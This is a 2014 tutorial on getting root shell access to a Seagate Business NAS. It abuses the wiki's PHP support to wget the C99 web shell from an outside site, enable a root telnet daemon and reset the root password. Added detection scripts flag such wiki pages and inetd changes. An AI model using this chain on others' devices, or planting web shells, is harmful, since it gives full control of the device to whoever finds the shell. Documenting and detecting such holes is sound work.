SEAGATE BUSINESS NAS
ACCESSING THE SHELL

February 1, 2014
by Jeroen Diel
IT Nerdbox

Table of Contents

Introduction
Technical specifications
Gaining access to the shell
Enable the Wiki server
Configure the Wiki Server
Create a new Wiki Page
Enable the telnet daemon
Adding users and change passwords
Other thoughts
Reverse engineering the file system
Analyzing uimage & u-boot

Introduction

The Seagate Business NAS is a file server that is used to store and share your data across your Local Area Network (LAN). The operating system on the Seagate Business NAS is Linux based. However, by default you will only get access to a web interface to control your device.

As a technical person, you may prefer to have full control over your devices, but Seagate decided not to allow this by default. This document describes how it is possible to get shell access using telnet.

Being able to execute commands as root may cause your device to fail beyond recovery. If you are not familiar with Linux operating systems, this document is probably not for you. IT Nerdbox cannot be held responsible in case your device crashes or fails beyond recovery. By using this document, you agree to all the terms described in this section.

Technical specifications

The following table shows the technical specifications of the Seagate Business NAS with firmware version 2013.60311.

Software      Version
Kernel        2.6.35.13-cavm1.whitney-econa.whitney-econa #2 Thu Jul 18 14:51:22 PDT 2013 armv6l
BusyBox       v1.13.2
Web Server    Lighttpd/1.4.28
PHP           PHP/5.2.13
FTP Server    vsftpd 2.3.4

Gaining access to the shell

This section describes how to gain shell access to the Business NAS by enabling the telnet daemon. Several steps are required in order to do so.

Background information

For those who are interested in some background information on how it is possible to gain shell access, please keep on reading.

First the Wiki server has to be enabled. This is required because, with the right configuration in the wiki server, it is possible to execute PHP code. The web server is running under the root account; this is required to perform certain administrative actions on the Business NAS. PHP is configured to allow all its functions, such as system and exec. Taken together, these facts make it possible to execute PHP code as the root user.

With this information it is possible to download a web shell. A web shell is a web page that is able to communicate with the operating system installed on the server using the execution environment of the web scripting language, PHP in this case. Once the web shell is loaded it is possible to execute operating system commands in an easy way. It even allows us to modify (configuration) files, such as the inetd.conf.

Enable the Wiki server

First it is required to enable the wiki server on the Business NAS. In order to do so, use the following steps:

1. Log in to your Business NAS, using the administrative web interface.
2. Go to Sharing.
3. Click on Wiki Server.
4. Enter a share name, select a volume and select the enable box.

Once the Business NAS is done configuring the wiki share, the Go to Wiki Server button will be enabled. Click this button to go to the new wiki server.

Configure the Wiki Server

Once you are on the wiki page, use the login button to log in. The same admin credentials that are used to log in to the administrative web interface of the Business NAS can be used here.

Once logged in as an administrator, it is required to configure the options. In the configuration options, enable PHP and save the configuration.

Create a new Wiki Page

The next step is to create a new wiki page. Since PHP was enabled for Wiki pages in the previous step, it is possible to execute PHP code as root. By using the <php> and </php> tags the wiki server allows the execution of PHP code. Use the following code to download the C99 web shell:

    <php>
    exec("wget -O shell.php http://www.c99txt.net/s/c99.txt");
    </php>

Important side notes:

It is important to understand that downloading a web shell to your NAS which is directly connected or available over the internet is dangerous. Anyone who is able to find this shell has full access to your Business NAS and is able to fully compromise it. Please remove this file once you are done gaining access to the shell.

Another important note is that it generally is a bad idea to allow access to any device over the internet. A good example is the Black Armor NAS for which I have written a remote root exploit. This allows anyone to take any Black Armor NAS. If it is required to have your administrative interface available over the internet, it is highly recommended to consider implementing IP restrictions for these interfaces.

Once the code has been saved, click on the Show page button. Now, it seems like nothing happened. However, the PHP code downloads the c99.txt file and saves it as shell.php at the following location:

    http://<ip>/dokuwiki/shell.php

Use your browser to go to this location. If everything went right, you should be able to see a screen similar to the screenshot below.
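
For checking a wiki for pages like the one created above, the following added example (not part of the original document) scans page sources for <php> blocks that call command-execution functions such as the system and exec mentioned earlier. It assumes the wiki stores each page as a .txt file below the directory passed in; the function names and the sample pages are constructed for illustration.

```shell
#!/bin/sh
# Added example: find wiki page sources whose <php> blocks call PHP
# command-execution functions.
# Assumption: pages are stored as .txt files below the directory given.

# scan_wiki_pages DIR
# Prints "file:line:text" for every flagged line; prints nothing when clean.
scan_wiki_pages() {
    find "$1" -type f -name '*.txt' -exec awk '
        FNR == 1 { inphp = 0 }                 # tag state never spans files
        {
            line = tolower($0)                 # matches both <php> and <PHP>
            active = inphp                     # already inside a block?
            rest = line
            # Walk every opening/closing tag on the line, in order.
            while (match(rest, /<\/?php>/)) {
                inphp = (substr(rest, RSTART, 2) != "</")
                if (inphp) active = 1
                rest = substr(rest, RSTART + RLENGTH)
            }
            if (active && line ~ /(^|[^a-z0-9_])(exec|system|passthru|shell_exec|popen|proc_open)[ \t]*\(/)
                printf "%s:%d:%s\n", FILENAME, FNR, $0
        }
    ' {} +
}

# Constructed sample pages for a stand-alone run.
demo_scan() {
    d=$(mktemp -d)
    printf '%s\n' '====== Backup notes ======' \
        'The C function system() is not PHP here.' > "$d/notes.txt"
    printf '%s\n' 'Lab page' '<php>' 'system("id");' '</php>' > "$d/lab.txt"
    scan_wiki_pages "$d"
    rm -rf "$d"
}

demo_scan
```

The check works per line, so code that follows a closing tag on the same line as the block is also reported; treat hits as leads to review, not as verdicts.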

Enable the telnet daemon

In this next step, the telnet daemon will be enabled at boot. Using the web shell, navigate to the /etc/ directory and edit the file called inetd.conf. In this file, a line is commented out by the # sign at the beginning of the line. The line that needs to be enabled is:

    telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd

Just remove the # sign from the beginning and save the file. Now either restart inetd or reboot the NAS and the telnet daemon will be enabled.

Adding users and change passwords

Using the web shell, it is possible to execute certain commands on the operating system. It is useful to create new shell users and/or change the root password.

Description:

    Add a user to the system
    Change a user's password
    Change the root password

One line command:

    adduser <username>
    echo password | passwd <username>
    echo password | passwd
    echo password | passwd root
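
The inetd.conf change described under "Enable the telnet daemon" can be detected by comparing the current file against a known-good copy. The following is an added example, not part of the original document; the function names and both sample files are constructed, and where the known-good copy comes from (for instance an extracted firmware image) is left to the reader.

```shell
#!/bin/sh
# Added example: report inetd services that are commented out in a
# known-good inetd.conf but active in the current one.

# newly_enabled BASELINE CURRENT
# Prints "service user program" for each entry whose leading "#" was removed.
newly_enabled() {
    awk '
        { s = $0; sub(/^[ \t]+/, "", s) }      # ignore leading whitespace
        FILENAME == ARGV[1] {                  # pass 1: baseline file
            if (s ~ /^#/) {
                sub(/^#+[ \t]*/, "", s)
                if (split(s, f) >= 6) disabled[f[1]] = 1
            }
            next
        }
        s != "" && s !~ /^#/ {                 # pass 2: active lines only
            if (split(s, f) >= 6 && (f[1] in disabled))
                print f[1], f[5], f[6]
        }
    ' "$1" "$2"
}

# newly_enabled_root_telnet BASELINE CURRENT
# Narrows the result to newly enabled telnet entries that run as root.
newly_enabled_root_telnet() {
    newly_enabled "$1" "$2" | awk '$1 == "telnet" && $2 == "root"'
}

demo_inetd() {
    d=$(mktemp -d)
    # Constructed baseline: telnet commented out, as the text describes.
    printf '%s\n' '# inetd.conf (constructed sample)' \
        '#telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd' > "$d/base"
    # Constructed current file: the same line with the # sign removed.
    printf '%s\n' '# inetd.conf (constructed sample)' \
        'telnet stream tcp nowait root /usr/sbin/telnetd /usr/sbin/telnetd' > "$d/cur"
    newly_enabled "$d/base" "$d/cur"
    rm -rf "$d"
}

demo_inetd
```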

Other thoughts

This section describes some of the other thoughts I have regarding the Seagate Business NAS. If you are a developer and feel like sharing ideas with me, feel free to contact me. Perhaps it is possible to set up certain projects together in order to get the most out of the Business NAS.

Reverse engineering the file system

Downloading the latest firmware shows two files, an .img file and a .md5 file. Extract the files to a new location. Now use WinRar to extract the .img file. While doing so a new file called is found. Since the extracted file does not have a file extension, it needs to be inspected to see what type of file it is.

The file seagate_nas-update-1360311-2bay was copied to one of the Linux Virtual Machines for further inspection. Using the Linux command file it is possible to identify files.

As displayed in the screenshot, the file is a tar archive which means we can extract it using the tar command:

Squashfs is a compressed read-only file system for Linux. Using the command file again will display more information about this file system:

Extracting the rfs.squashfs file (you might need to install the squashfs-tools):

The squashfs file system has been extracted in the directory squashfs-root.

This directory contains the same content that is visible through the web shell interface when browsing to the root (/) of the file system. It is possible to make changes to the file system and create a new file called rfs.squashfs using the command mksquashfs.

It seems to be possible to write your own firmware for this Business NAS. It is currently unknown what kind of checks the Seagate Business NAS performs in order for you to upload a modified firmware. A detailed analysis of the firmware upgrade process might be required. The config.ser file might have to be modified as well since it contains MD5 hashes for the file system and the kernel.

Analyzing uimage & u-boot

uboot is an open source Universal Boot Loader which is frequently used in Linux based operating systems and uimage is the kernel image. Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images.

Analyzing both files: